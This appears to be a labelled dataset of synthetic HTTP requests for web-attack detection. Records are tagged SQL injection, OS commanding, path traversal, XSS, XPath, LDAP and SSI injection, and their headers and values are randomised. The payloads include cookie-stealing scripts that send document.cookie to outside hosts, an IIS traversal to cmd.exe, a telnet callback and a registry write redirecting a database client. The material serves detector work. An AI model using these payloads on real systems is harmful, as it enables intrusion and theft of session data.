Authorization: NTLM azNnd1NWNmlsZXJJZGVvbmRzeEVodmFldG5zdG9ubUVu
Range: 271-,17364-
Referer: /frvnK/cutes8o.mpeg
TE: gzip;q=0.4,deflate;q=0.1
Trailer: User-Agent
User-Agent: Mozilla/0.2 (Machintosh; U; PPC Mac OS X 9.4; hu-li; rv:8.2.2) Gecko/44774665
UA-CPU: PowerPC
UA-Disp: 098,0653,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8002x1361
Via: 3.5 160.131.188.245, FTP/2.0 17.134.19.141
Transfer-Encoding: deflate
Upgrade: cGu/7.6
Warning: 301 www.aNxatsl.gif "mcn8ho5" "Mon, 26 Jan 09 23:46:07 CET"
X-Forwarded-For: 111.102.133.122
X-Serial-Number: 02001
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40055
Start - Id: 42040
class: SqlInjection
GET /unaoSeiioGBa8iM@fjqu/syceaj9eo/iframeeeqHz9FiX.asmx?44m.X=l%24Ft&Ek7yuWc4xIdK=uOwjS9iK2F&Akmj4Og2oswmu=o+&neEai7apceo=cpkb8%40&ste=stm&ood=and+0%3C%3E%28select++count%28*%29++++from+++6aioa++++where++de8xzed%3C%3E%29 HTTP/1.1
Host: 85.150.107.82:708
Connection: neomhlE0
Accept: video/quicktime, text/*, image/*
Accept-Charset: windows-1255, big5
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=0
Client-ip: 80.172.139.192
Cookie: wqhe8y1tf=awp-d<
Cookie2: $Version="633"
Date: Sun, 15 Jun 08 14:14:58 GMT
ETag: "wcne.To77bHV22Xl8aXt"
Expect: 100-continue
From: lhrrhh9j@48Flats.biz
If-Modified-Since: Thu, 30 Jun 05 19:50:11 GMT
If-Unmodified-Since: Tue, 17 Feb 04 09:38:48 CET
If-Match: "VfEM8frSXO.2ibpbdK9"
If-None-Match: *
If-Range: *
Max-Forwards: 87
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: 5heq iYitkt=3sapN
Authorization: Digest response="859b51C4AfBb44A1bAaFB219Eeb03cac"
Range: 35443-,-5,630005-
Referer: /agtrve9/zihhisn.swf
TE: trailers,trailers,gzip;q=0.2
Trailer: Accept
User-Agent: pstr (dlhP9S@q; o6a6861I7)
UA-CPU: StrongARM
UA-Disp: 7502,392,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 422x9399
Via: HTTP/7.4 148.27.16.62
Transfer-Encoding: 9sidq; v4oyRNt=rnxsdz1s
Upgrade: hUrier/3.1, imsa/1.4, hntw/4.9
Warning: 769 10.15.201.53 "Godo5tfeue" "Sat, 19 Aug 06 13:20:24 UTC"
X-Forwarded-For: 183.45.204.126
X-Serial-Number: 78968713276550254
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42040
Start - Id: 44088
class: OsCommanding
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.tAsrrtcd.net
Connection: keep-alive
Accept: application/zip;q=0.1, application/*, image/*
Accept-Charset: iso-8859-8;q=0.3, windows-1255;q=0.9, windows-1252;q=0.2, euc-cn;q=0.8
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.8
Cache-Control: entui=c6e5fhtl
Client-ip: 56.136.139.128
Cookie: ennfnsseoA4j8uo=0409848;odilt5urpTco1oi=cq$ohe:trb;sym4eniesn=2039006;aLd=6105085;nhruplwNT0nil=2415011;ler4nlolflneeo=hmmAnffuD
Cookie2: $Version="0"
Date: Fri, 09 Apr 04 01:12:41 GMT
ETag: "CFu08e9ETvSFfKNT.C"
Expect: 100-continue
From: ixam@eaec.uk
If-Modified-Since: Mon, 11 Sep 06 05:41:47 GMT
If-Unmodified-Since: Wed, 15 Apr 09 13:08:23 GMT
If-Match: *
If-None-Match: *
If-Range: "nqyUNpCJJmNI08R"
Max-Forwards: 131
MIME-Version: 0.4
Pragma: tpee3pwh=etrzuti
Proxy-Authorization: NTLM YTlha3RlZjlua29weWVzb2s3MW5yemFoMm5wbk4waVJzZW9ndG4zTGhpOGh0aQ==
Authorization: Basic dmVtdGw6NHRoZWhl
Range: 70-
Referer: /lrrnbd/aytwiaa/p8tss2/qtlsrNe/aeuaaqt.bin
TE: trailers,deflate,deflate
Trailer: Authorization
User-Agent: 1dtieuin/9.8.0
UA-CPU: x86
UA-Disp: 6409,6413,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1501x189
Via: w2he/7.4 www.ohoaiall.png, tatd/2.3 www.lrtNeuo.htm
Transfer-Encoding: 2cou23
Upgrade: unHis2/9.7, sDw/8.7
Warning: 578 121.175.223.34:52334 "pneeY2IslooLh" 
X-Forwarded-For: 91.48.222.8
X-Serial-Number: 388289600968011
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44088
Start - Id: 44655
class: PathTransversal
GET /DrtoifbouOeSailvys0/uetNngihw/sA0Bs1a/eZIA/e8KFifRTvB@cL2jlJ/jcmcsys9/iak.mspx? HTTP/1.1
Host: 160.209.102.179
Connection: close
Accept: application/zip, video/*;q=0.0, application/*
Accept-Charset: *
Accept-Encoding: compress, identity, deflate
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 8.237.241.62
Cookie: ob=ua];9y=haccess_log0:et;nullsrtealinka rr~;sensrcq0t9oaa=collection( file:///c:/hnUht/etolcer.xml     );Funion3tYSE=6;lste=ihgefEpl
Date: Tue, 22 Nov 05 18:54:19 CET
ETag: "U_ZNTM@RFl.A2VUa"
Expect: r1Un
If-Modified-Since: Sun, 07 Feb 10 17:55:45 GMT
If-Unmodified-Since: Fri, 27 Feb 04 04:42:06 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 30 May 07 04:38:40 UTC
Max-Forwards: 0191
Pragma: mennx7so=ZtnEs
Proxy-Authorization: eaowfh leeewnas=9Iy2e
Authorization: Digest realm
Range: 2485-,266-3,-56504
Referer: http://www.auhieel.com/rsoecrr7/oNgoiuvc.png
TE: gzip
Trailer: Connection
User-Agent: 10k@rR4pZb http://www.a3eeS4ti.uk
UA-CPU: MIPS
UA-Disp: 5203,127,16
UA-Pixels: 8872x5937
Via: HTTP/0.0 88.241.69.1:4814, 3.1 www.imnibf.shtml:150, FTP/1.9 www.5woP.shtml
Transfer-Encoding: compress
Upgrade: ervl/3.1, rWat5n/5.8
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44655
Start - Id: 40971
class: SqlInjection
GET /Pxp_dncK6cn60diM/oU6O/iZhV4/4Ik@j4NEK6Bt-zJ.jsp?O84C=+tditmmek%24+sp%29x6ulO&ypfrregrbn29=ree&lhco=varetrrmemig1d+ALek5&Rooebflsoi=14194&nctdrtd=8 HTTP/1.1
Host: www.zntmuaa.org
Connection: Ehus
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: exec     xp_regwrite  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo','srlrfm9utp','REG_SZ','DBMSSOCN,hackersip,80'
Cache-Control: max-stale=3
Cookie: iua47lecg=5815173;h7tn=ej8Fpl@;vdOdesyc=ehtssz3enat6ddGjf9;p60.z=397869524;yaxpcn3n3scd=tLakZCNyMH
Cookie2: $Version="34"
Date: Thu, 23 Apr 09 15:53:55 GMT
ETag: "Kf@7..91LZ5JErV-"
Expect: adtid6cn
From: fhayeuit@tufahb.fr
If-Modified-Since: Tue, 09 Feb 10 04:56:40 CET
If-Match: *
If-Range: Fri, 14 Aug 09 18:54:07 GMT
Max-Forwards: 875
MIME-Version: 1.1
Pragma: ekno='o'
Referer: /waen/0otniee/idkoOr.mdb
User-Agent: Mozilla/1.6 (X11; U; Unix 7.1; oO-Iy; rv:3.8.5) Gecko/98850987
Via: ito/1.4 63.163.43.211:00, FTP/4.0 195.25.212.38, HTTP/4.9 www.tiaOeu.gif
Warning: 891 www.Dgnneo.png "tgConortovhrr" 
X-Forwarded-For: 175.150.199.175

null

End - Id: 40971
Start - Id: 47083
class: XSS
GET /afgLCkcW7pAMT_HOWjB/-oJJ8krYfhomer5NF/tv/gsLgfn0es/ZD3m/ZJ/KCbptmp-tMb3/uKasNv4wS/reISz0v/tGFKXQS/8XaQS5biH3lTODGv5l.htm?a8xrsieeIetfo=dGgfZGWn8.9&ec5dliiiOritei=472&dleuesehj=560&lcfa=%3Cxml+++++id++%3D%22+++X+%22+%3E%3Ca+++%3E%3Cb%3E%26lt%3Bscript+%3E%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.ieient.com%2Fcgi-bin%2Fllesli.cgi%27%2Bdocument.cookie%29%3B%5D%26lt%3B%2Fscript++++%3E%3B%3C%2Fb+%3E%3C%2Fa+%3E%3C%2Fxml+%3E HTTP/1.1
Host: www.alcd.org:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: cp-936, shift_jis, x-mac-hebrew;q=0.2, x-mac-arabic, utf-7;q=0.7
Accept-Encoding: 
Accept-Language: N-scienii, h-ePA6tN, ylreeir-srNsf;q=0.1
Cache-Control: ohu='sddBa'
Client-ip: 4.100.87.145
Cookie: ightNeedzele=k;ntteh2n=794;OEQlQM=n8pelShoreersaeRs;est=h ;4JO2=tQaMot-zsENP;qWa6wwbtlaa=148071
Cookie2: $Version="41"
Date: Thu, 06 Mar 08 18:02:01 GMT
ETag: W/"5flgWqTfDcqEkoyRjTt"
Expect: 100-continue
From: en3oiyg@ysel.org
If-Modified-Since: Sat, 03 Jul 04 04:06:42 CET
If-Unmodified-Since: Sat, 30 Oct 04 02:04:04 GMT
If-Match: *
If-None-Match: "ya0cPobEObx8JqG.RD"
If-Range: Tue, 20 Nov 07 05:47:14 GMT
Max-Forwards: 0576
MIME-Version: 8.0
Pragma: esannB=eoOt9ke
Proxy-Authorization: sevi uteRs=ionsesm
Authorization: NTLM cmxpZWdvZGlkbHRkdGhyYWk1ZGl3TW1udmdNajd4dG50Yk8=
Range: -409656
Referer: /IiTdMp3/aiteero/dnfa.msf
TE: trailers
Trailer: Warning
User-Agent: imksllargh (dm5DMPnE; hS_wKdh-xQ; iD-soB2; aTXHadN; iJpJw2)
UA-CPU: x86
UA-Disp: 016,6175,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 389x1282
Via: 1.1 www.oeiui.gif:89, 7.9 www.vtbyicn.jpg
Transfer-Encoding: identity
Upgrade: dljr/5.8, liii/6.7, 9es/6.3
Warning: 699 www.gnimlw.jpeg "bgtHtysIo0h" "Wed, 01 Aug 07 11:24:11 UTC"
X-Forwarded-For: 69.181.229.169
X-Serial-Number: 60697232
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47083
Start - Id: 41721
class: SqlInjection
GET /YfmISvmdocumentxB9u/iSfOZ7/a4blU2.jT7y/Chzhlink/etfshtariwseott/tWUN/5Fg1Slinkpasswd0Iw.U.css?5N3adhdeihEetac=526+++or++id%3E6+++or++ls_id%3C0912 HTTP/1.1
Host: 176.214.48.192
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, deflate;q=0.2, deflate;q=0.7, deflate;q=0.4
Accept-Language: Rjecraer-h3, ydu6ptsp-dtqsit, e89w-sbAB;q=0.6, aln8ue-avanNh8, ild-lV9t;q=0.4
Cache-Control: only-if-cached
Client-ip: 118.213.186.63
Cookie: StonatoiU=8160980;tlim=ecmdtes7;oEo4l0=ht;mwn=153531671;eoiaL8ca=ad95mQLzeDnF
Cookie2: $Version="483"
Date: Sat, 09 Apr 05 07:52:31 CET
ETag: W/"mBchHL7aQtkPkmSctxou"
Expect: 100-continue
From: daatsa@4adiaM.fr
If-Modified-Since: Mon, 26 Jul 04 14:44:18 CET
If-Unmodified-Since: Thu, 19 Jun 08 21:04:19 GMT
If-Match: *
If-None-Match: "GXrGnNJe9dDO4fka"
If-Range: *
Max-Forwards: 422
MIME-Version: 9.0
Pragma: en=3
Proxy-Authorization: Basic cnF5cmFkbWk6N2kzM2Q=
Authorization: NTLM bW50UHNhdHdybm5uZXJFYXN2d2lsZWlvYm12cmlsdHRUdGZ0YQ==
Range: -08
Referer: /sg7Ui/obSeur/6alt5b.nsf
TE: trailers,chunked;q=0.8
Trailer: Via
User-Agent: emCDQX6 http://www.hi1setel.net
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 431x0868
Via: FTP/1.4 57.123.195.248
Transfer-Encoding: compress
Upgrade: aah/4.0
Warning: 132 www.gls0.js "sseahcsnj2f1dtnEm93r" 
X-Forwarded-For: 152.105.208.9
X-Serial-Number: 611965021882313
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41721
Start - Id: 47724
class: XSS
GET /tezttmn1dkf1oJne/7OGiPl.7jexb7wrY5IC/tg-RTdscv@Mf/s_a67q2li9DNP/ceW/ha1vjz3u/gYkO1-UukROlj/O6A@/h7tn@/syeu7EeidEeqa/c_8ipMbz/ut_aAMr.html?yxnti=oHR4cGVKXGs.&T45I0HE=af&CvBW=33729644&ohshdE=ifgQt1E0a&tnoilta=%28puag&Aedah=%27ape&Io3staywtdt=%3Ciframe++++src++++%3D+%22+++++vbscript%3A%5Bwindow.open%28%27http%3A%2F%2F202.140.253.148%2Fndange.cfm%27%2Bdocument.cookie%29%3B%5D++++++++++%22+++%3E HTTP/1.0
Host: 183.255.222.70
Connection: a2p4
Accept: video/*
Accept-Charset: iso-8859-7;q=0.0, iso-2022-kr
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 90.114.63.204
Cookie: IE6UOxftp=rNi;6sapnsRssc0=0;lwtIhtpisC=WTt;oe=uts;bun=4 lnt& midiu
Cookie2: $Version="0"
Date: Sat, 29 Jan 05 23:41:13 GMT
ETag: "3NoB8gEdJ4qpGAoUK"
Expect: 100-continue
From: aonie0x@uTdtewu.be
If-Modified-Since: Sat, 01 Nov 08 22:33:54 GMT
If-Unmodified-Since: Wed, 22 Feb 06 24:05:12 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 95
MIME-Version: 0.5
Pragma: Ne='SeAeW'
Proxy-Authorization: Basic bW9hcmE6QWN5c2JlZXM=
Authorization: ep9mla t3deafei=hrshcr
Range: 2174-,56-,-57382
Referer: /onsng/eEYeyoWa.msf
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/1.6 (X11; U; SunOS sun4u 2.4; el-0e; rv:2.3.1) Gecko/98991739
UA-CPU: 68000
UA-Disp: 2301,334,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 0710x100
Via: HTTP/6.7 www.elhl.htm:9
Transfer-Encoding: compress
Upgrade: dkl9/3.1, Y30iPN/9.5, ieat/6.0, mjwRi/1.0
Warning: 328 www.rri2Tey0.htm "ndrOro" "Wed, 18 Nov 09 04:33:59 UTC"
X-Forwarded-For: 210.225.244.166
X-Serial-Number: 89188723783
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47724
Start - Id: 49176
class: XPathInjection
GET /a-3kesBCBek/shutdowniusrRLiV8ibS/iYk7drJailEDPw.cfm?nhun6raosyr=o0nsx&FlinkI.jIA=906&4SNqbT=mdEXXhy6J%40ej&bkSmailpOIV8=2706&rOala=%28i++++%3C+++++count%285tttir%2Fchild%3A%3Atext%28%29%29++++and++j+%3C+++++count%28eSsc%2Fchild%3A%3Acomment%28%29%29+++and+++k+%3C++++count%282tl2s%2Fchild%3A%3A*%29++++%29&f00da=it&qfic=0bnao&l9mMmol=48U2DegI2Ofw HTTP/1.0
Host: www.gtaednaa.org
Connection: leo9aty
Accept: application/zip
Accept-Charset: x-mac-roman;q=0.4, euc-tw;q=0.8, euc-jp
Accept-Encoding: 
Accept-Language: *
Cache-Control: 6naMr='gip'
Client-ip: 222.14.181.160
Cookie: lT5OixoMos=b;syomGj7u1d=ebody;osEbedtna=saetRttnt;dspk=E;soEhoHemap=iyNzenbxDA2;n3fgEliurjeef=xmln4o
Cookie2: $Version="1"
Date: Mon, 17 Oct 05 01:11:31 GMT
ETag: "I4LM-0MgNgkmOnkc-s3"
Expect: 100-continue
From: iahsis@optiai.de
If-Modified-Since: Sun, 07 Jun 09 10:21:57 CET
If-Unmodified-Since: Fri, 29 May 09 23:57:20 CET
If-Match: *
If-None-Match: "0Yg8f6_vXNgCq-M-twq0"
If-Range: Wed, 23 Feb 05 15:21:09 CET
Max-Forwards: 5
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Basic bnRlbHdoZXc6bnRpZQ==
Authorization: Basic NGk2ZWVsOnJhcm1sSGM=
Range: -695984
Referer: http://www.xgSnfen.uk/saodrlm/eteeeu.mpg
TE: trailers,deflate,deflate;q=0.8
Trailer: Host
User-Agent: Mozilla/4.4 (X11; U; Open BSD i386 3.1; go-aa; rv:7.0.1) Gecko/44107606
UA-CPU: x86
UA-Disp: 146,749,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 290x3654
Via: FTP/1.8 18.2.78.251:315
Transfer-Encoding: deflate
Upgrade: q8iste/1.0, ici/0.5, qtyr3/1.9, oea/6.5, h1e5st/7.2
Warning: 382 78.125.64.215 "ptlueeneohddxrty" "Fri, 18 Jul 08 15:26:47 UTC"
X-Forwarded-For: 19.241.14.123
X-Serial-Number: 6850092
----: ------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 49176
Start - Id: 49853
class: XPathInjection
GET /ltho/MsiqTC58EnXHT/mGS/linkstyleBo/KBu--j41o/2TMe.js?crtanfs=agroup+by%5Ds&oooogynaehoStb=otw3sNasina9O&enreE2=d63&oilqtp4b=o16V&2EgWqstyleyDTizs=%28i++%3C++++count%28ebouIt%2Fchild%3A%3Atext%28%29%29+++and++j+++%3C+++count%28rteh%2Fchild%3A%3Acomment%28%29%29+++and+++++k+++%3C+count%28NdKlr%2Fchild%3A%3A*%29++++%29 HTTP/1.1
Host: www.Enretu.net:80
Connection: keep-alive
Accept: application/postscript;q=0.2
Accept-Charset: windows-1250;q=0.0, iso-10646-ucs-2;q=0.6, euc-cn, windows-1257
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 236.200.66.115
Cookie: sWHvnvwzllu5siy=e;z1xgrdallQcopyW=95;O0iselect11dX6W=2mauTiuxQE;clJF-=j3B@ s~wp-etci0qen4gh
Cookie2: $Version="7"
Date: Wed, 29 Aug 07 10:46:54 CET
ETag: W/"Xx8JR4V4r-QIlXyJ"
Expect: 100-continue
From: ohlydam@WdehaAi.biz
If-Modified-Since: Wed, 10 Dec 08 24:13:51 GMT
If-Unmodified-Since: Wed, 30 Dec 09 21:28:58 UTC
If-Match: "MEX5cOi2gSaiqVe2s0rg"
If-None-Match: "Rd8lnWTUmjeqffHUmwS"
If-Range: Fri, 26 Jan 07 14:09:45 UTC
Max-Forwards: 729
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic bGFydHZyOGM6OFNvbGNldA==
Authorization: xlE0 aelJ=NEonemxl
Range: 98475-041,374-
Referer: /uote/Ep5axw/rSalasiu/elIi/rerilskt.msf
TE: chunked
Trailer: Upgrade
User-Agent: Mozilla/9.6 (Machintosh; U; PPC 4.4; r5-li; rv:5.2.1) Gecko/20099789
UA-CPU: 68000
UA-Disp: 020,0020,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 967x245
Via: FTP/0.7 140.133.133.58
Transfer-Encoding: gzip
Upgrade: soar/0.1
Warning: 988 26.40.140.189 "waoenT" 
X-Forwarded-For: 56.172.198.103
X-Serial-Number: 6075380404911977
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49853
Start - Id: 39470
class: SSI
PUT /x3tstyleynandbv2z/eDi7zh6wam56V/e33693PwkU.jsp? HTTP/1.1
Content-Length: 25
Content-Language: o,5iae,uercn
Content-Encoding: gzip
Content-Location: /ntriahel/e4tv/ftReta.asmx
Content-MD5: ZDE3akVuNmR0aW5xc29taQ==
Content-Type: application/x-www-form-urlencoded
Host: www.sveyocEo.gov
Connection: 3hem0sg
Accept: */*
Accept-Charset: *
Accept-Encoding: <!--#echo var="date_gmt"-->
Accept-Language: *
Cache-Control: only-if-cached
Date: Tue, 13 Sep 05 03:20:44 CET
Expect: 100-continue
From: zO5ldjrt@WIls.cz
If-Unmodified-Since: Wed, 19 Aug 09 14:04:15 GMT
If-Match: *
If-Range: "eUBKF3H5UHgaN1xabUxc"
Max-Forwards: 144
Authorization: lgnId auko43=Swctiz
Referer: http://4Mah.gov/nhBikbA/nand/tOteG.html
User-Agent: todRJs8Ohr http://www.L8aSsfot.it

noltrns=3&e6ir09et=hsb|

End - Id: 39470
Start - Id: 35983
class: PathTransversal
POST /Uid1l1tcKVgt0ju/aiifDrserio1oiatn/eosyclaiweQ9/hRHoO/eIlghj-z@8.md/sa5rmSaLer0.png? HTTP/1.0
Content-Length: 108
Content-Language: jiislen
Content-Encoding: identity
Content-MD5: Z2NnZW5jc1VkbnUzemVvZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 May 09 14:46:27 UTC
Host: 84.0.12.111
Connection: nix3
Accept: */*
Accept-Charset: isiri-3342, x-mac-japanese;q=0.2
Accept-Encoding: *
Accept-Language: ry25aose-ifs;q=0.1, o-esrndsh, 95m-s6hg6af, a2Su0aot-ewAWh
Client-ip: 110.8.182.127
Cookie2: $Version="01"
Date: Wed, 15 Nov 06 11:13:52 GMT
Expect: 100-continue
If-Unmodified-Since: Mon, 27 Sep 04 07:06:34 GMT
If-None-Match: *
Max-Forwards: 7935
Referer: /am11owa/T3wcaie/eyebpci/raixit7.nsf
User-Agent: Mozilla/3.6 (Machintosh; U; PPC 6.7; ze-je; rv:1.9.6) Gecko/37280289

annnot9e8io=na4&paAhdYkLea7Tn=29155501&EmweseTycEgdise=i7&FK3ngwv8=x:\autoexec.bat&nh=r=rnernaLs2YofIg

End - Id: 35983
Start - Id: 48209
class: XSS
PUT /pDperlinputK@ORLQQv/stmpacceptjtp/qKsDQ5qq3U_QR/ld/m6xQ5bUP7PHK/Eueci2s/sI/U6ayvuz_0aOg_9ftp/oYs5/lrt6.cfm? HTTP/1.0
Content-Length: 238
Content-Language: t0ap0jk,eile6a,fxisra
Content-Encoding: compress
Content-Location: /ymdrH/sjlre/oiOomhs/aprrho1c.asp
Content-MD5: RHNhZm84dnNvNmRpNnQwVA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 03 Jan 08 23:20:40 GMT
Last-Modified: Thu, 01 Nov 07 04:37:29 UTC
Host: 252.107.254.113
Connection: rufh
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, compress;q=0.0
Accept-Language: <input    type   =    "  image     "   dynsrc= "   javascript:  [document.location.replace    ('http://www.raisde.com/cgi-bin/tireetmaie.cgi'+document.cookie);]    "   >
Cache-Control: max-stale
Client-ip: 188.123.167.43
Cookie: eiWlvtC0ksap=hn9weeaoeKddawt;ynniDkndMaorncs=l6NU;sneslenEaeiiO=includeiy;eeqAewha3eE8f= b5sju9/Hors7e Ed ;raeSpeiEeea=31579785
Cookie2: $Version="5"
Date: Tue, 22 Aug 06 21:39:51 GMT
ETag: W/"JkNm7sD6l4qVMEyYQ5ri"
Expect: iQbird
From: kTOsae7a@Lnatniube.cz
If-Modified-Since: Mon, 19 Jun 06 14:03:12 UTC
If-Unmodified-Since: Thu, 08 May 08 08:23:42 CET
If-Match: *
If-None-Match: "-JeeQkIneJBvcnuG_j"
If-Range: Sat, 17 May 08 17:05:07 CET
Max-Forwards: 88
MIME-Version: 6.3
Pragma: esSm=eltioIo
Proxy-Authorization: Digest cnonce="ccntio"
Authorization: Digest realm
Range: 9-78819
Referer: http://www.noeinid.gov/gMtE/6oa6/iEshw/daElos/6oysii9.php4
TE: trailers,deflate;q=0.3,trailers
Trailer: If-Unmodified-Since
User-Agent: tnebl/1.5.7.2
UA-Disp: 5215,325,8
UA-Color: color32
UA-Pixels: 2557x0166
Via: FTP/1.1 www.erws.js, 1.9 www.lybsdere.htm, 3.8 www.duszjamh.html
Transfer-Encoding: identity
Warning: 893 78.20.40.155 "h9rlthiE7eebet5grc" 
X-Forwarded-For: 16.22.84.83
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

BlxBH=ftp8a@ft%A4\%e]d&J9echoW-1B3eloghaving=31452292&ee=6719277&hkIEscriptz=1226113&Zrchild@E7UO=ctldett1zel&hlhgyrnestoi=;itsprocessing-instruction&Tltshsst=m&raoashmttrcmh=400520&y1NWG2optfnEm=sbviaYeT&boot.iniQmail_=h wp-o

End - Id: 48209
Start - Id: 38857
class: LdapInjection
GET /nnncdoaoAtmeNsnwh6/c1m/4WK/aeiuluro/3uuvroorfmrnc0ii4/l0MeXy6jXIDa/l8oEw/nGoURjy5D7yH./ga1ajrmidapt/TUruw@inputE@l-xsamW/4dlPhhahyNnbddet9/QYxtermsprocessing-instructionPXR.gif?eiwoNhi8=mzncdRf1t&titktacaaceiat=4&slteRWrsod=m&MbrtfwfRcbnwecr=%29++++%28+++%7C%28+cn%3D*o++%27brien*+%29%28mail++++%3D*o++++%27brien*+++%29&1ta3memrrtnMse=3&lannSa=i%5Ctksa+detlibEkod&EElfNle0bai0yme=aiseopbaiioUrrAoi0&1T3lzwEZn_=33823681&nteP=aiGcsftnnlgh0tioue HTTP/1.0
Host: www.ueiG.uk
Connection: fksk1asg
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: o00-8, rokda-lOe5i;q=0.4, lysweal-littis;q=0.2, ts8x2qro-tnun, e9-teb9c;q=0.9
Cache-Control: max-age=54
Client-ip: 149.133.119.108
Cookie: athIggo=0;opIt2=sLsoa;ede=Bylnrcn8wser;mpokNesnmttt=79614918;ushtg=msUopassthru;siYy=u2og
Cookie2: $Version="90"
Date: Wed, 22 Apr 09 15:09:50 CET
ETag: W/"@7Yjn8ZE2@SsNW_j"
Expect: beeepata=O503do;rmagetie
From: tdusret@b5koNnc.biz
If-Modified-Since: Sun, 01 Oct 06 08:33:06 CET
If-Unmodified-Since: Wed, 23 Jan 08 14:07:09 UTC
If-Match: *
If-None-Match: "-TK5-yCJjZAv.aKI7jV"
If-Range: Mon, 27 Jun 05 16:58:12 CET
Max-Forwards: 1
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest username="Et14a"
Range: -909693
Referer: /sida8a/tipe4y/hd5s.txt
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/1.0 (Machintosh; U; PPC Mac OS X 7.7; am-ar; rv:0.2.8) Gecko/48420611
UA-CPU: PowerPC
UA-Disp: 117,0811,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 279x383
Via: 1.1 10.199.113.222
Transfer-Encoding: gzip
Upgrade: tey/4.0, 12heee/5.9, ilc/0.2, rztl/8.5, cehnt/0.1
Warning: 313 www.NteEt.png "Pcgrneh6n" "Fri, 24 Jul 09 11:00:14 GMT"
X-Forwarded-For: 145.148.155.9
X-Serial-Number: 74857144808284221
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38857
Start - Id: 50113
class: XPathInjection
POST /n9hesAdza08xsTevkoct/08i5h73UQDIV@/Eirnom2uotentOmp/WDfm48M6services_.Z/GwhereUyC/rc1vmAvWFXwMMh32fMya/3hewdppt.html? HTTP/1.1
Content-Length: 230
Content-Language: otoeJ,mr
Content-Encoding: gzip
Content-Location: /nitt/l9pzs/nesmiens/5yCgaljf.png
Content-MD5: ZXNoN29zbmhkZW53ZW5pTw==
Content-Type: application/x-www-form-urlencoded
Host: 178.111.19.8
Connection: close
Accept: image/jpeg;q=0.2, application/x-tar, audio/basic;q=0.0
Accept-Charset: windows-1254, euc-cn, utf-8, euc-kr;q=0.4, x-mac-japanese;q=0.2
Accept-Encoding: *;q=0.0
Accept-Language: nbeo-e9reh, oAoX0e-MdBnll, cnleA-cd;q=0.5, d8-iaume;q=0.1
Cookie: kuts=nle;ZdfHsre=xrZoi' or  1<     n/taaart/o/child::text()[position()=03]    or 'nide'=   '
Date: Tue, 30 Oct 07 01:57:01 CET
If-Modified-Since: Mon, 03 Jan 05 17:26:25 CET
Referer: http://www.tcfdt.biz/terl.php
Trailer: Date
User-Agent: Mozilla/2.0 (Windows; U; Win 9x 3.6; oe-oe; rv:3.0.0) Gecko/36294681
UA-Color: color8
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lh9d=%[&gnfahi=6&sTdliUUgbspoaR=lt0sd'thtpass7(rejemailaHhas&fxxehofxubttoe=stae<@>67e&anteahfi= &LcmdsystemH.metaa@H=tNaUTK&6hiVtrai=orosLIitwdthe3c&ysUltcxth8c= sewp-I+ftpe ee mlinkt&J@O4QgEVuTF=ejf31rt0eoRlcsnS8

End - Id: 50113
Start - Id: 43435
class: OsCommanding
GET /access_logbT6E0urB/tSasoonyunir1Mtti/iE/w0Osey7tx/.E5echol@stdin6processing-instruction/rteaO7eiee.bin?D_hTQy@65.a=%5C%22+%5C%3B+++%5C%2Fusr%5C%2Fbin%5C%2Ftelnet++www.rastenel.com+++++34%5C%3B&batuttn=fr&2winntEfj_L=scriptrNhstmjcmd&4eiehteeaiirt=soIahtaaeos8NbcUum&erEqosAe=deifhtacyEdlRhf&wh0dkoe=xt6bn&eXhr=oi+dbgsound&M921KubX=ann%5Chnre&eqb=360457&4hrr=15 HTTP/1.1
Host: 208.95.220.146
Connection: hilehGx
